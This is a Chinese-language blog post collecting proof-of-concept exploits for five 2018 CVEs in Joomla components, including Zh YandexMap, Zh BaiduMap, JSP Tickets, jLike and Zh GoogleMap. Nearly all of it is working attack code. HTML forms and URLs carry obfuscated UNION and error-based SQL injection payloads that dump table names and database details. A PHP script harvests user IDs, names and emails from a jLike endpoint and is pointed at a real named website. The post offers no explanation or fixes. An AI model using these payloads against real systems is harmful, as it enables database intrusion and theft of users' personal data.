对应CVE

1.CVE-2018-6604 Component Zh YandexMap 6.2.1.0 sql注入

2.CVE-2018-6605 Component Zh BaiduMap 3.0.0.1 sql注入

3.CVE-2018-6609 Component JSP Tickets 1.1 sql注入

4.CVE-2018-6610 Component jLike 1.0 信息泄露

5.CVE-2018-6582 Component Zh GoogleMap 8.4.0.0 sql注入

 

1.6604详细信息

<html>
<body>
<!–com_zhyandexmap/controller.php–>

<!–# 1)–>
<!–L 29: public function getPlacemarkDetails() {……..}–>
<form action=”http://localhost/[PATH]/index.php?option=com_zhyandexmap&no_html=1&format=raw&task=getPlacemarkDetails” method=”post”>
<input name=”id” value=”-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,/*!01111CONCAT*/((/*!01111SELECT*/(@x)/*!01111FROM*/(/*!01111SELECT*/(@x:=0x00),(@NR:=0),(/*!01111SELECT*/(0)/*!01111FROM*/(INFORMATION_SCHEMA.TABLES)/*!01111WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!01111AND*/(0x00)IN(@x:=/*!01111CONCAT*/(@x,/*!01111LPAD*/(@NR:=@NR%1,4,0×30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11–” type=”hidden”>
<input type=”submit” value=”1-Ver Ayari”>
</form>

</body>
</html>

 

2.6605 详细信息

<html>
<body>
<!–com_zhbaidumap/controller.php–>

<!–# 1)–>
<!–L 27: public function getPlacemarkDetails() {……..}–>
<form action=”http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails” method=”post”>
<input name=”id” value=”-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,/*!01111CONCAT*/((/*!01111SELECT*/(@x)/*!01111FROM*/(/*!01111SELECT*/(@x:=0x00),(@NR:=0),(/*!01111SELECT*/(0)/*!01111FROM*/(INFORMATION_SCHEMA.TABLES)/*!01111WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!01111AND*/(0x00)IN(@x:=/*!01111CONCAT*/(@x,/*!01111LPAD*/(@NR:=@NR%1,4,0×30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11–” type=”hidden”>
<input type=”submit” value=”1-Ver Ayari”>
</form>

<!–# 2)–>
<!–L 356: public function getPlacemarkHoverText() {……..}–>
<form action=”http://localhost/Joomla375/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkHoverText” method=”post”>
<input name=”id” value=”-22 UNION ALL SELECT 22,22,22,22,22,22,22,22,/*!02222CONCAT*/((/*!02222SELECT*/(@x)/*!02222FROM*/(/*!02222SELECT*/(@x:=0x00),(@NR:=0),(/*!02222SELECT*/(0)/*!02222FROM*/(INFORMATION_SCHEMA.TABLES)/*!02222WHERE*/(TABLE_SCHEMA!=0x696e226f726d6174696f6e5f736368656d61)/*!02222AND*/(0x00)IN(@x:=/*!02222CONCAT*/(@x,/*!02222LPAD*/(@NR:=@NR%1,4,0×30),0x3a20,table_name,0x3c62723e))))x)),22,22–” type=”hidden”>
<input type=”submit” value=”2-Ver Ayari”>
</form>

<!–# 3)–>
<!–L 411: public function getPathHoverText() {……..}–>
<form action=”http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathHoverText” method=”post”>
<input name=”id” value=”-33 UNION ALL SELECT 33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,/*!03333CONCAT*/((/*!03333SELECT*/(@x)/*!03333FROM*/(/*!03333SELECT*/(@x:=0x00),(@NR:=0),(/*!03333SELECT*/(0)/*!03333FROM*/(INFORMATION_SCHEMA.TABLES)/*!03333WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!03333AND*/(0x00)IN(@x:=/*!03333CONCAT*/(@x,/*!03333LPAD*/(@NR:=@NR%1,4,0×30),0x3a20,table_name,0x3c62723e))))x)),33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33–” type=”hidden”>
<input type=”submit” value=”3-Ver Ayari”>
</form>

<!–# 4)–>
<!–L 756: public function getPathDetails() {……..}–>
<form action=”http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathDetails” method=”post”>
<input name=”id” value=”-44 UNION ALL SELECT 44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,/*!04444CONCAT*/((/*!04444SELECT*/(@x)/*!04444FROM*/(/*!04444SELECT*/(@x:=0x00),(@NR:=0),(/*!04444SELECT*/(0)/*!04444FROM*/(INFORMATION_SCHEMA.TABLES)/*!04444WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!04444AND*/(0x00)IN(@x:=/*!04444CONCAT*/(@x,/*!04444LPAD*/(@NR:=@NR%1,4,0×30),0x3a20,table_name,0x3c62723e))))x)),44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44–” type=”hidden”>
<input type=”submit” value=”4-Ver Ayari”>
</form>

</body>
</html>

 

3.6609详细信息

1.http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=[SQL]

-66′ /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL–+VerAyari

2.http://localhost/[PATH]/index.php?option=com_jsptickets&controller=statuslist&task=edit&id=[SQL]

66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

3.

http://localhost/[PATH]/index.php?option=com_jsptickets&controller=prioritylist&task=edit&id=[SQL]

66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

4.

<form method=”post” action=”http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=display”>
<input type=”text” name=”jform[guestemail]”…
<input type=”text” name=”jform[ticketid]”…
<input type=”submit” name=”searchsubmit”…
</form>

 

6610详细信息

header (‘Content-type: text/html; charset=UTF-8’);
$url= “http://www.projectcontrolsinstitute.com/”;
$p=”index.php?option=com_jlike&task=getUserByCommentId&tmpl=component&format=row”;
$url = file_get_contents($url.$p);
$l = json_decode($url, true);
if($l){
echo “*—————————–*<br />”;
foreach($l as $u){
echo “[-] ID\n\n\n\n:\n” .$u[‘id’].”<br />”;
echo “[-] Name\n\n:\n” .$u[‘name’].”<br />”;
echo “[-] Email\n:\n” .$u[’email’].”<br />”;
echo “<br>”;
}echo “*—————————–*”;}
else{echo “[-] No user”;}
?>

 

6582详细信息

<html>
<body>
<!–com_zhgooglemap/controller.php–>

<!–# 1)–>
<!–L 30: public function getPlacemarkDetails() {……..}–>
<form action=”http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPlacemarkDetails” method=”post”>
<input name=”id” value=”-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0×30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11–” type=”hidden”>
<input type=”submit” value=”1-Ver Ayari”>
</form>

<!–# 2)–>
<!–L 363: public function getPlacemarkHoverText() {……..}–>
<form action=”http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPlacemarkHoverText” method=”post”>
<input name=”id” value=”-22 UNION ALL SELECT 22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0×30),0x3a20,table_name,0x3c62723e))))x)),22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22–” type=”hidden”>
<input type=”submit” value=”2-Ver Ayari”>
</form>

<!–# 3)–>
<!–L 418: public function getPathHoverText() {……..}–>
<form action=”http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPathHoverText” method=”post”>
<input name=”id” value=”-33 UNION ALL SELECT 33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e336f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0×30),0x3a20,table_name,0x3c62723e))))x)),33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33–” type=”hidden”>
<input type=”submit” value=”3-Ver Ayari”>
</form>

<!–# 4)–>
<!–L 763: public function getPathDetails() {……..}–>
<form action=”http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPathDetails” method=”post”>
<input name=”id” value=”-44 UNION ALL SELECT 44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0×30),0x3a20,table_name,0x3c62723e))))x)),44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44–” type=”hidden”>
<input type=”submit” value=”4-Ver Ayari”>
</form>

</body>
</html>

 

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注